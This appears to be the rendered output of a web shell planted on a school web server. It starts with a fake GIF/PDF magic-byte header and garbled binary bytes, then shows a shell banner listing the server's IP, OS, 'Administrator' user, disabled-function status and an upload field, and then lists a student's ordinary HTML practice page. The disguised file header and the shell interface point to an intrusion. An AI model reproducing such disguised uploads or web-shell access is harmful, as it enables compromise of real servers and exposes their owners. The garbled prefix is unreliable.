GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/examples/ |
Upload File : |
<!doctype html> <html> <head> <meta charset="utf-8"> <title>Untitled Document</title> <link href="css/site.css" rel="stylesheet" type="text/css"> </head> <body> <h2 id="fixed14">This is fixed at 400x100</h2> <h1>This is a heading</h1> <nav id="topNav"> <ul> <li>nav 1</li> <li>nav 2</li> <li>nav 3</li> </ul> </nav> <nav id="leftNav"> <ul> <li>nav 1</li> <li>nav 2 is a very long navigation item</li> <li>nav 3</li> </ul> </nav> <a href="_index.html">underscore index</a> <img src="assests/images/googlelogo_color_272x92dp.png" width="544" height="184" alt=""/> before <div>This is div one.</div> <span id="anId">after</span> <div class="tRight">Contains four <span class="fr">span one</span> <span class="fr">span two</span> floating span elements <span class="f1">span four</span> <span class="f1">span three</span> </div> <div class="tRight">Contains four <span class="fr">span one</span> <span class="fr">span two</span> floating span elements <span class="f1">span four</span> <span class="f1">span three</span> </div> <div class="tRight">Contains four <span class="fr">span one</span> <span class="fr">span two</span> floating span elements <span class="f1">span four</span> <span class="f1">span three</span> </div> <div class="tRight">Contains four <span class="fr">span one</span> <span class="fr">span two</span> floating span elements <span class="f1">span four</span> <span class="f1">span three</span> </div> </body> </html>